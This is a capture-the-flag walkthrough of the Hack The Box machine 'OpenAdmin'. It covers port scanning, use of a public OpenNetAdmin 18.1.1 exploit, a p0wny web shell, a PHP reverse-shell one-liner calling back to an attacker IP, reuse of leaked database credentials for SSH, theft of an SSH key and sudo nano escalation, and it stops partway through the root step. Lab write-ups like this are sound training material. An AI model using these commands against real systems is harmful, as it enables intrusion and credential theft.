Today, we’re going to solve another CTF machine OpenAdmin. It is now a retired box and can be accessible to VIP members.
- Target OS : Linux
- Services : SSH, HTTP
- IP Address : 10.10.10.171
- Difficulty : Easy
- Getting user
- Getting root
As always, the first step consists of the reconnaissance phase as port scanning.
During this step, we’re gonna identify the target to see what we have behind the IP Address.
nmap -sC -sV -oA 10.10.10.171
By running gobuster we found /music and /artwork directory with 301 status code.
gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.171/ -s '200,204,301,302,307,403,500' -e | tee '/root/htb/10.10.10.171/scans/10.10.10.171_80_gobuster_common.txt'
If we browse URL http://10.10.10.171/music
If we click on login there’s OpenNetAdmin installed.
Let’s enumerate OpenNetAdmin and Google what really it is?
There’s an OpenNetAdmin installed
Since our target version of OpenNetAdmin is 18.1.1 we got two exploits for it.
Let’s searchsploit -m exploits/php/webapps/47691.sh.
I tried to run exploit it didn’t work for some reason.
I had to dos2unix 4691.sh
And we got low privilege shell.
By going through ona config file we found a database creds.
'db_type' => 'mysqli', 'db_host' => 'localhost', 'db_login' => 'ona_sys', 'db_passwd' => 'n1nj4W4rri0R!', 'db_database' => 'ona_default',
Let’s try getting a proper shell first.
I tired every reverse shell such as Perl, Python, and bash none of them worked for me.
I did wget p0wny-shell and uploaded it and got a reverse shell through that way.
php -r '$sock=fsockopen("10.10.14.242",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
And got a reverse shell instant.
Seems like we don’t have permission to both of the directories.
If you remember we had SQL Database let’s dump it.
We don’t have access to SQL or neither SQLDump is installed.
There’s a reused password for jimmy.
lets SSH to jimmy with SQL creds which we found.
ssh firstname.lastname@example.org n1nj4W4rri0R!
After doing some enumeration and looking for something interesting.
If you take a look at main.php we’ll see it’s our way to get joanna ssh private key. But we don’t know where it’s hosted let’s take a look at apache config.
If you take a look at internal.conf and we’ll see it’s running on port 52846. Let’s make sure if that port is opened for us.
Seems like it’s only opened for the local network but luckily we’re already on the network.
And we got joanna private ssh key.
And we got the password!
let’s do SSH login as joanna.
ssh -i key email@example.com - bloodninjas
Now, that we’re login as joanna let’s do some enumeration.
If we do sudo -l
joanna can sudo run nano to read /opt/priv without password
input to sudo /bin/nano /opt/priv enter nano editor